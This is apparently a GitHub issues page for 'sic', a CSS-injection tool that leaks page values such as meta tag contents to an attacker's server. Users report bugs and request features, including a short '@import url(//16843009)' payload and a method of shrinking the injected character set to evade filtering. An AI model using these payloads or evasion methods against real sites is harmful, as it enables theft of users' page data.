sic's People

Contributors

d0nutptr, honoki

sic's Issues

Problems while trying to exfiltrate <meta>

I tried exfiltrating <meta> tag and it gets stuck - it makes 2 requests and then all other requests are set to pending. I have to click on meta in source code to continue exfiltrating.
After doing this and clicking on the request, it says Stalled. Clicking on Explanation, I found out that it's queueing the requests for some of these reasons:

  • There are higher priority requests.
  • There are already six TCP connections open for this origin, which is the limit. Applies to HTTP/1.0 and HTTP/1.1 only.
  • The browser is briefly allocating space in the disk cache


Is there any way this can be fixed or bypassed?

Still works?

Hi,

First, great article + finding + tool 😉
I tried to reuse it years later with different browsers (Firefox, Chrome). I did not succeed in making it work.
As I struggle a bit with Rust, I have not been able to modify the code as I wished (I wrote my own "clone" of your idea in Go; it works with a bot, but not with my browsers).

So my question is simple: do you know if the trick still works? If yes, on which browser?

Thanks in advance

Protocol Relative URL support

Hey d0nut,

In testing the use of Nginx to terminate HTTPS connections for sic, I receive the following error:

thread 'tokio-runtime-worker-0' panicked at 'called `Result::unwrap()` on an `Err` value: RelativeUrlWithoutBase', src/libcore/result.rs:999:5

This happens when supplying a protocol-relative URL as the Polling or Callback host, like this:

./sic -p 3000 --ph "//a.pwnu.net" --ch "//b.pwnu.net" -t template_file

Using protocol-relative URLs would allow sic payloads to work on both HTTP and HTTPS pages simultaneously.

BTW - Here's the example Nginx config I promised you.

Best,
NBK

Slow Performance

Hey d0nut,

So I thought it was the proxy that was introducing latency, but actually even directly connected to the internet, my speeds are nowhere near the ones in your demo video. It's taking about 2 minutes to discover 5-7 characters.

Before I start doing packet capture/analysis I wanted to make sure that you haven't run into this problem before. I'm testing w/ Chrome and FF on Win 10, sic is running on an Ubuntu VPS w/out firewall. Did you have any special TCP settings on the client or server?

Also, lack of a Content-Type header is causing IE to not evaluate the CSS.

Also, also, I see mention of an environment variable for debugging. How is that used?

Thanks

Payload response for /

Hey d0nut, here's another enhancement request.

Since we're specifying charset on the command line, why not also allow specifying a default staging len value. This way if no path is specified, a targeted payload could still be delivered.

For example, if we could only inject (assuming protocol-relative URL support):
@import url(//attacker.com)
Then a payload could be generated using whatever len argument was specified via the command line (a sensible default, like 12 could be assumed if none is provided via URL or CLI).

This would have the advantage of limiting the characters required for successful injection to only ().a-z/ . This could be reduced further to just ()0-9/ using dotless IP to just:

@import url(//16843009)

Wouldn't that be cool?
